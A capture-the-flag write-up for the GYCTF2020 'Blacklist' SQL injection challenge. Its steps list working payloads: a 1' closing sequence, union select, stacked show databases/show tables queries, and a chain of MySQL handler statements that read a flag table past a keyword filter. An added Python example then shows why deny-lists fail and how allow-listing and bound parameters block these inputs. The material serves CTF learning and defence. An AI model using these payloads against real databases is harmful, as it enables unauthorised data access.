[GYCTF2020]Blacklist 1
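1. This looks like an injection challenge where a blacklist has to be bypassed. After a series of tests, the closing sequence can be determined to be 1'
The payload 1' union select 1,2# makes the application reveal its blacklist.
2. Continue constructing payloads: 1' or 1=1# confirms the closing sequence.
Next, use the statement 1';show databases;#
3. 1';show tables;#
4. There are two tables. Many keywords are filtered, but the handler statement is not, so we use handler to construct the payload: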
1';handler FlagHere open;handler FlagHere read first;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;

Using the handler statement
handler user open;
handler user read; outputs whatever is read
handler user read first [where username='admin'];
handler user read next [where username='admin'];
The parts in [] are optional.
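
Seen from the defending side, the steps above work because a keyword deny-list only blocks what its author thought of. The following is an added example, not code from the challenge or from this write-up: it runs the payloads quoted above through a constructed deny-list and through an allow-list combined with a bound parameter. The deny-list pattern, the table "words" and its columns are assumptions, and SQLite stands in for MySQL.

```python
import re
import sqlite3

# Constructed deny-list standing in for the challenge's filter (assumption:
# the page does not show the real pattern, only that handler is not on it).
DENYLIST = re.compile(r"select|update|delete|insert|drop|where|union", re.I)

# Inputs quoted in the write-up above (the handler chain is shortened).
SAMPLES = [
    "1",
    "1' union select 1,2#",
    "1';show tables;#",
    "1';handler FlagHere open;handler FlagHere read first;",
]

def denylist_allows(value: str) -> bool:
    """Deny-list check: passes anything that avoids the listed keywords."""
    return DENYLIST.search(value) is None

def allowlist_allows(value: str) -> bool:
    """Allow-list check: the parameter is an id, so accept digits only."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

def lookup(conn: sqlite3.Connection, value: str):
    """Reject non-numeric input, then bind the value so it is data, not SQL."""
    if not allowlist_allows(value):
        return None
    query = "SELECT id, word FROM words WHERE id = ?"  # hypothetical schema
    return conn.execute(query, (int(value),)).fetchall()

def demo():
    """Return (input, passes_denylist, lookup_result) for every sample."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE words (id INTEGER, word TEXT)")
    conn.execute("INSERT INTO words VALUES (1, 'hello')")
    return [(s, denylist_allows(s), lookup(conn, s)) for s in SAMPLES]

if __name__ == "__main__":
    for sample, passed, rows in demo():
        print(f"{sample!r}: denylist_pass={passed} lookup={rows}")
```

On a MySQL back end the same fix also means executing a single statement per call with a bound parameter rather than a multi-statement call, which is what lets the ;-separated statements in steps 2 to 4 run.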